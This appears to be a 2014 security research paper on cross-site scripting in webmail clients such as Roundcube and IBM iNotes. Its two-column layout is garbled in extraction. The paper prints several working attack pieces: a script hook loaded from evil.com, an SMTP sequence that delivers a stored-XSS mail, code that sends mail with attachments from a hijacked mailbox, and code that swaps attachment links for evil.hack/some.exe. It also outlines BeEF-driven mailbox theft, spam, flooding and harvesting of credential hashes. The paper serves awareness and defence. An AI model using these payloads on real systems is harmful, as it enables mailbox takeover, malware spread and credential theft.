The email that is watching you
Bart Leppens and Anthony Piron
December 19, 2014
Abstract
Cross-site Scripting (XSS) is probably the most common security vulnerability exisiting in web applications
at large. Nevertheless, the impact of Cross-site Scripting is still seriously underestimated by many people and
even major companies. The CVE-scores given for Cross-site Scripting issues are on the average pretty low, but on
the opposite side an adversary does not care. Cross-site Scripting vulnerabilities will make his dreams come true.
The impact of Cross-site Scripting in webmail applications does not differ from those in regular web applications,
however, the mail-infrastructure is a top-notch target for a Cross-site Scripting-attack.
Keywords: Cross-site Scripting, webmail, attack
1
Contents
1
The Web is a mess
1
2
The anecdotal Cross-site Scripting
2.1 Cross-site Scripting in Webmail clients .
2.1.1 Reflected Cross-site Scripting
in roundcube . . . . . . . . . .
2.1.2 Stored Cross-site Scripting in
Lotus iNotes . . . . . . . . . .
2.1.3 Universal Cross-site Scripting
and Webmail . . . . . . . . . .
2.2 Injecting a JavaScript hook . . . . . . .
2.3 BeEF: the Command & Control server .
1
2
3
4
A myth: there ain’t no such thing
3.1 Targeted mailbox attack . . . . .
3.2 Worm nesting and replication . .
3.3 DDoSing . . . . . . . . . . . .
3.4 Mass mailing . . . . . . . . . .
3.4.1 DDoS of a mailbox . . .
3.4.2 Send spam . . . . . . .
3.5 Download infection . . . . . . .
3.6 Being at someone’s beck and call
Conclusion
Bibliography
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
The Web is a mess
The Internet was done so well that
most people think of it as a natural
resource like the Pacific Ocean, rather
than something that was man-made.
When was the last time a technology
with a scale like that was so
error-free? The Web, in comparison,
is a joke. The Web was done by
amateurs
2
2
Alan Kay
2
2
2
Building a secure website is hard, very hard. So
many things may go wrong. Even renowned experts
have hard times to be successful. The Web is unnecessarily extremely complex. How many different concepts? How many flawed designs? How many dangerous features? How many half-baked mitigations?
The most innocent looking vulnerability is a ticking disaster: a time-bomb on every single website. The
question is not about “how” or “what” but “when”.
3
3
3
3
3
3
3
4
4
2
5
The anecdotal Cross-site Scripting
The web browser is the operating system of a web application. A Cross-site Scripting vulnerability is no more
than a remote distributed arbitrary code execution. New
5
1
2.1.3
name for an old concept, what may go wrong? Let’s
imagine an attacker could execute some arbitrary lines
of code in the security context of your favorite webmail.
This is not a frivolous dream, there are multiple CVEIDs related to Cross-site Scripting in webmail. Crosssite Scripting is everywhere but sometimes hard to spot
and/or to prevent.
2.1
Universal Cross-site Scripting and Webmail
When your browser or an add-on has a Universal Crosssite Scripting bug, an attacker may be able to execute
scripts in the context of every origin. This may also be
the case when the user has installed a malicious browser
add-on. It is obvious that an attacker can attack even
cloud-based webmail services like e.g. Hotmail, GMail,
... that have no known public Cross-site Scripting issues.
Cross-site Scripting in Webmail clients
It is clear that there are multiple ways to achieve Crosssite Scripting in webmail. Here are some examples:
2.2
Injecting a JavaScript hook
Instead of just displaying alert(1) or the document’s
cookies to the user, the attacker can inject a JavaScript
2.1.1 Reflected Cross-site Scripting in roundcube
hook as well. For it to be more effective we can append
CVE-2011-2937 [3], a reflected Cross-site Scripting our script-tag to top.window.document. In that way, we
vulnerability in the UI message functionality of Round- don’t lose our hook when, for example, the victim opens
cube Webmail before 0.5.4 found by Abyszko. Ac- another mail in his iNotes-client.
cording to the description of the bug [12] in the bug
(function(){
alert(document.cookie). CVE
var script=top.window.document\
score for this bug is 4.3 out of 10.
.createElement(’script’);
2.1.2
script.type=’text/javascript’;
script.src=’http://evil.com/hook.js’;
top.window.document\
.head.appendChild(script);
})();">
Stored Cross-site Scripting in Lotus iNotes
CVE-2014-0913 [4], a stored Cross-site Scripting vulnerability in IBM iNotes and Domino 8.5.3 FP6 before
IF2 and 9.0.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via an e-mail message. The following code allows to reproduce the bug:
Once the hook is running on the infected browser,
the JavaScript hook can poll a given Command and Control Server (C&C Server) to check if there are commands that need to be executed within the security context of the currently hooked page. Multiple victims can
be simultaneously hooked and each victim is known by
a unique identifier. This ID needs to be different with
every hook sent to each victim.
telnet iNotesSMTPserver 25
HELO xss
MAIL FROM: attacker@evil.com
RCPT TO: poorvictim@good.com
DATA
MIME-Version: 1.0
FROM: ATTACKER
TO: VICTIM
Subject: iNotes XSS vulnerable mail
Content-Type: text/html
2.3
BeEF: the Command & Control server
Once the JavaScript hook is injected in the webmail
client, an attack can control the webmail by a C&C
Server. Penetration testers will probably be familiar
with BeEF: The Browser Exploitation Framework [2]
(The Browser Exploitation Framework) C&C Server.
We added several modules for BeEF that can exploit
webmail-clients.
.
CVE score for this bug is 4.3 out of 10.
2
given his unid. The third module, Send iNotes [13], allows to send a note from a hooked browser.
+-----------------+
|
Attacker
|
+-----------------+
|
|
V
+---------------------+
| BeEF C&C
|
|
Server
|
+---------------------+
^
^
^
|
| poll |
|
|
|
+----------+ | +----------+ |
| Infected |-+ | Infected | +-...
| Webmail |
| Webmail |
+----------+
+----------+
3.2
Worm nesting and replication
In 2007, Rosario Valotta already demonstrated the huge
impact of Cross-site Scripting in webmail. He create the
Nduja worm [10], a cross domain webworm that was
able to propagate itselfs across 4 Italian webmail services. The worm is named after a spicy pork sausage
Nduja from Calabria Italy.
3.3
DDoSing
All zombies that are hooked to the BeEF C&C Server
can take part in a DDoS attack. For this there is no need
All the zombies that are infected with JavaScript
to control the origin of the webmail. Interesting thing
hook will obey the C&C Server. Here we are interested
here is that when the victim is behind a corporate firein zombies hooked (infected) within the origin of the
wall, the attacker can use the webbrowser as a pivot and
webmail.
start to DDoS internal servers as well. Every newly inFor exploiting IBM iNotes we have added several
fected zombie can take part in a DDoS attack. This can
modules to the BeEF-project. If you are able to control
easily be automatically automated be executed with the
the origin, you can extract a list of notes, read the details
DOSer-module [5] written by Michele Orru’ which is
of a note and even send a note.
available in BeEF.
3
A myth: there ain’t no such thing 3.4 Mass mailing
So, we control the origin. Just to show how bad this may
be, we provide you with some potential attack scenarios
in the following paragraphs. As an additional reference
we suggest the reader to have a look at The Browser
Hacker’s Handbook [1]. The book contains in-depth
analyses and multiple real-life examples of how things
can go wrong when the origin is controlled, as well as
attacks that work cross-origin.
3.1
3.4.1
DDoS of a mailbox
When the BeEF zombies are hooked within the origin of
the webmail, all these zombies can be used to flood the
mailbox of someone. When the attack is performed with
a sufficient amount of zombies at a decent sending rate,
this will result in a denial of service of that users mailbox or even a denial of service of the whole mailserver.
This can be done with the iNotes Flooder-module [7]
which is available in BeEF.
Targeted mailbox attack
When an attacker targets his victim, he can perform actions on behalf of his victim. With Cross-site Scripting
an attacker can send a mail in the name of the victim
to another victim. The principle of confidentiality will
be broken as well since the attacker can access all messages in the victims mailbox and see all of the victim’s
contacts. To achieve this with iNotes, there are 3 modules available in the BeEF (The Browser Exploitation
Framework). The first module, Extract iNotes list [6],
returns a list of unid’s from all the notes. A second module, Read iNotes [11], allows to read the details of a note
3.4.2
Send spam
An attacker can use the hooked zombies to send spam
on behalf of the victim’s mailbox. This can potentially
bypass anti-spam filters since the victim will probably
have a good reputation. The attacker can also extract a
list of contacts from his victim’s mailbox and then send
a spam message from the victims mailbox to each of his
contacts. If that contact has great confidence in the victim, this can lead towards a more succesfull spamming
campaign.
3
3.5
Download infection
xhr.sendAsBinary(post_data);
When a contact receives a mail from an attacker sent by
Cross-site scripting from a victim’s mailbox, thisperson
may have great confidence in the attachments that are
sent with such a malicious mail. This gives an attacker
an easy way to infect a contact’s computer with a malicious executable.
The following code can be used to send an e-mail
with an attachment:
Sending an email with attachment can also be easily
done with the Send iNotes with attachment-module [14]
which is available in BeEF.
A second possibility is to substitute the url of the link
or to overload the onClick event with JavaScript in order to serve another malicious file on a victim’s click.
The substitution may be done with the following trivial
code:
var to = "to@mail.com";
var subject = "mail with attachment";
var body = "Hello,\r\nDear reader of
this mail with attachment!"
var filename = "filename.bin";
var filedata = "\xDE\x76\x77\x66";
top.window.frames["s_MainFrame"].
document.getElementsByClassName("s
-attachments-text")[0].
getElementsByTagName("a")[0].href=
"http://evil.hack/some.exe";
Or substitue the link for all the attachments:
[...snip...]
[].map.call(top.window.frames["
s_MainFrame"].document.
getElementsByClassName("sattachments-text")[0].
getElementsByTagName("a"),
function (a) { a.href="http://evil
.hack/some.exe" });
var xhr = new XMLHttpRequest();
//the URI to send the request to
var uri = notesURL + "/($Inbox)/$new/?
EditDocument&Form=h_PageUI&
PresetFields=h_EditAction;
h_ShimmerEdit,s_ViewName;($Inbox),
s_NotesForm;Memo&ui=dwa_form";
//Initializes a request
xhr.open("POST", uri, true);
3.6
//Make the invocation with Cookies
xhr.withCredentials = true;
Being at someone’s beck and call
For now we have discussed a few attack vectors but there
are many many more. The limitation lies in the creativity and skills of the attacker. For example, IBM iNotes has a database named names.nsf [9]. This database
includes all mail addresses, users’ information, users’
operating systems, and other juicy information. This
file contains the hashes of all users’ credentials. These
hashes can be cracked with John The Ripper [8]. The
names.nsf file is often available to an anonynomous user
and since we run in the same origin, we can recuperate
its contents through Cross-site Scripting with AJAX. If
ACL’s are put in place to limit the access to the file
it’s often a matter of hooking the client of a Notesadministrator to have access to the database. Some other
possible scenario is the following: when the webclient
is infected with Cross-site Scripting, it is possible for
an attacker to send a copy, not necessarily by mail but
for example by cross-origin XHR, with the content of
each email sent. A last example would be that Cross-site
Scripting could be used to search in the victim’s mail for
stored credentials.
xhr.setRequestHeader("Content-Type", "
multipart/form-data; boundary=" +
boundary);
var post_data = boundary + "\r\n";
post_data += "Content-Disposition:
form-data;
[...snip...]
post_data += "Content-Disposition:
form-data; name=\"
HaikuUploadAttachment0\";
filename=\"" + filename + "\"\r\n"
;
post_data += "\r\n";
post_data += filedata + "\r\n";
post_data += boundary + "--";
//Send the request as binary data
4
4
Conclusion
When your webmail is infected with Cross-site Scripting, attack-scenarios are nearly endless. It is clear
that Cross-site Scripting in webmail and even Cross-site
Scripting in general is a serious problem. This security
problem is not well understood, not even by major vendors.
References
[1]
W. Alcorn, C. Frichot, and M. Orru. The
Browser Hacker’s Handbook. Wiley, 2014. ISBN:
9781118662090.
[2]
BeEF: The Browser Exploitation Framework.
URL: http://beefproject.com/.
[3]
CVE-2011-2937. URL: http : / / web . nvd .
nist . gov / view / vuln / detail ?
vulnId=CVE-2011-2937.
[4]
DOSer. URL: https : / / github . com /
beefproject / beef / tree / master /
modules/network/DOSer.
[6]
Extract iNotes list. URL: https://github.
com / beefproject / beef / tree /
master/modules/misc/ibm\_inotes/
extract\_inotes\_list.
iNotes Flooder. URL: https : / / github .
com / beefproject / beef / tree /
master/modules/misc/ibm\_inotes/
inotes\_flooder.
[8]
John The Ripper. URL: http : / / www .
openwall.com/john/.
[9]
names.nsf. URL: http : / / www - 01 . ibm .
com / support / docview . wss ? uid =
swg21212934.
[10] Nduja. URL: http : / / ha . ckers .
org / blog / 20070709 / nduja - cross domainwebmail-xss-worm/.
[11] Read iNotes. URL: https://github.com/
beefproject / beef / tree / master /
modules / misc / ibm \ _inotes / read \
_inotes.
[12] roundcube bugtracker. URL: http : / / trac .
roundcube.net/ticket/1488030.
CVE-2014-0913. URL: http : / / web . nvd .
nist . gov / view / vuln / detail ?
vulnId=CVE-2014-0913.
[5]
[7]
[13] Send iNotes. URL: https://github.com/
beefproject / beef / tree / master /
modules / misc / ibm \ _inotes / send \
_inotes.
[14] Send iNotes with attachment. URL: https :
/ / github . com / beefproject / beef /
tree / master / modules / misc / ibm \
_inotes / send \ _inotes \ _with \
_attachment.
5